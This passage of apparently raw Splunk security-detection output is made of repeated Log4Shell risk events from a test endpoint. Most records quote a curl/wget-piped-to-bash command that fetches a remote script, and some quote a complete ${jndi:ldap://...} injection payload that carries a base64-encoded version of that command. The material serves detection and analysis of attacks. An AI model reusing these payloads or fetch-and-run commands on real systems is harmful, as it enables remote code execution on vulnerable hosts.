http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642641816, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642641816, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642641816, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642641816, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642641816, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642641816, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642641816, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642641554, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="Source:Endpoint", annotations._all="CIS 13", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CIS 12", annotations._all="Actions on Objectives", annotations._all="PR.DS", annotations._all="PR.PT", annotations._all="Stage:Initial Access", annotations._all="DE.CM", annotations._all="DE.AE", annotations._all="CVE-2021-44228", annotations._all="Command and Control", annotations._all="T1059", annotations._all="T1190", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-20T00:21:41", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:110", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642641551, search_name="ESCU - Log4Shell JNDI Payload Injection Attempt - Rule", action="Bad Request", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 3\",\"CIS 5\",\"CIS 16\"],\"context\":[\"Source:Application Log\",\"Stage:Execution\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Reconnaissance\",\"Exploitation\"],\"mitre_attack\":[\"T1190\"],\"nist\":[\"DE.CM\"],\"observable\":[]}", annotations._all="CIS 3", annotations._all="CIS 16", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Application Log", annotations._all="T1190", annotations._all="Exploitation", annotations._all="CIS 5", annotations._all="Reconnaissance", annotations._all="Stage:Execution", annotations._all="CVE-2021-44228", annotations._all="DE.CM", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 3", annotations.cis20="CIS 5", annotations.cis20="CIS 16", annotations.context="Source:Application Log", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Reconnaissance", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1190", annotations.nist="DE.CM", category="application/json", count="2", dest="10.0.1.21", dest_port="80", http_content_type="application/json", http_method="GET", http_referrer="unknown", http_user_agent="curl/7.79.1", info_max_time="+Infinity", info_min_time="0.000", risk_message="CVE-2021-44228 Log4Shell triggered for host 10.0.1.21", risk_object="10.0.1.21", risk_object_type="system", risk_score="15.0", savedsearch_description="CVE-2021-44228 Log4Shell payloads can be injected via various methods, but on of the most common vectors injection is via Web calls. Many of the vulnerable java web applications that are using log4j have a web component to them are specially targets of this injection, specifically projects like Apache Struts, Flink, Druid, and Solr. The exploit is triggered by a LDAP lookup function in the log4j package, its invocation is similar to `${jndi:ldap://PAYLOAD_INJECTED}`, when executed against vulnerable web applications the invocation can be seen in various part of web logs. Specifically it has been successfully exploited via headers like X-Forwarded-For, User-Agent, Referer, and X-Api-Version. In this detection we first limit the scope of our search to the Web Datamodel and use the `| from datamodel` function to benefit from schema accelerated searching capabilities, mainly because the second part of the detection is pretty heavy, it runs a regex across all _raw events that looks for `${jndi:ldap://` pattern across all potential web fields available to the raw data, like http headers for example. If you see results for this detection, it means that there was a attempt at a injection, which could be a reconnaissance activity or a valid expliotation attempt, but this does not exactly mean that the host was indeed successfully exploited.", site="localhost", src="${jndi:ldap://10.0.1.16:1389/Basic/Command/Base64/KGN1cmwgaHR0cDovLzguOC44Ljg6ODAvd3AtY29udGVudC90aGVtZXMvdHdlbnR5dGhpcnRlZW4vbTggfHwgd2dldCAtcU8gLSBodHRwOi8vOC44LjguODo4MC93cC1jb250ZW50L3RoZW1lcy90d2VudHl0aGlydGVlbi9tOCl8YmFzaA==}", url="http://10.0.1.21:80/", url_domain="10.0.1.21", user="unknown" 1642641554, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="Source:Endpoint", annotations._all="CIS 13", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CIS 12", annotations._all="Actions on Objectives", annotations._all="PR.DS", annotations._all="PR.PT", annotations._all="Stage:Initial Access", annotations._all="DE.CM", annotations._all="DE.AE", annotations._all="CVE-2021-44228", annotations._all="Command and Control", annotations._all="T1059", annotations._all="T1190", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-20T00:21:41", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:114", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642641551, search_name="ESCU - Log4Shell JNDI Payload Injection Attempt - Rule", action="Bad Request", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 3\",\"CIS 5\",\"CIS 16\"],\"context\":[\"Source:Application Log\",\"Stage:Execution\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Reconnaissance\",\"Exploitation\"],\"mitre_attack\":[\"T1190\"],\"nist\":[\"DE.CM\"],\"observable\":[]}", annotations._all="CIS 3", annotations._all="CIS 16", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Application Log", annotations._all="T1190", annotations._all="Exploitation", annotations._all="CIS 5", annotations._all="Reconnaissance", annotations._all="Stage:Execution", annotations._all="CVE-2021-44228", annotations._all="DE.CM", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 3", annotations.cis20="CIS 5", annotations.cis20="CIS 16", annotations.context="Source:Application Log", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Reconnaissance", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1190", annotations.nist="DE.CM", category="application/json", count="2", dest="10.0.1.21", dest_port="80", http_content_type="application/json", http_method="GET", http_referrer="unknown", http_user_agent="curl/7.79.1", info_max_time="+Infinity", info_min_time="0.000", risk_message="CVE-2021-44228 Log4Shell triggered for host 10.0.1.21", risk_object="unknown", risk_object_type="user", risk_score="15.0", savedsearch_description="CVE-2021-44228 Log4Shell payloads can be injected via various methods, but on of the most common vectors injection is via Web calls. Many of the vulnerable java web applications that are using log4j have a web component to them are specially targets of this injection, specifically projects like Apache Struts, Flink, Druid, and Solr. The exploit is triggered by a LDAP lookup function in the log4j package, its invocation is similar to `${jndi:ldap://PAYLOAD_INJECTED}`, when executed against vulnerable web applications the invocation can be seen in various part of web logs. Specifically it has been successfully exploited via headers like X-Forwarded-For, User-Agent, Referer, and X-Api-Version. In this detection we first limit the scope of our search to the Web Datamodel and use the `| from datamodel` function to benefit from schema accelerated searching capabilities, mainly because the second part of the detection is pretty heavy, it runs a regex across all _raw events that looks for `${jndi:ldap://` pattern across all potential web fields available to the raw data, like http headers for example. If you see results for this detection, it means that there was a attempt at a injection, which could be a reconnaissance activity or a valid expliotation attempt, but this does not exactly mean that the host was indeed successfully exploited.", site="localhost", src="${jndi:ldap://10.0.1.16:1389/Basic/Command/Base64/KGN1cmwgaHR0cDovLzguOC44Ljg6ODAvd3AtY29udGVudC90aGVtZXMvdHdlbnR5dGhpcnRlZW4vbTggfHwgd2dldCAtcU8gLSBodHRwOi8vOC44LjguODo4MC93cC1jb250ZW50L3RoZW1lcy90d2VudHl0aGlydGVlbi9tOCl8YmFzaA==}", url="http://10.0.1.21:80/", url_domain="10.0.1.21", user="unknown" 1642641515, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._all="T1105", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642641515, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._all="T1105", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642641515, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._all="T1105", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642641515, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool 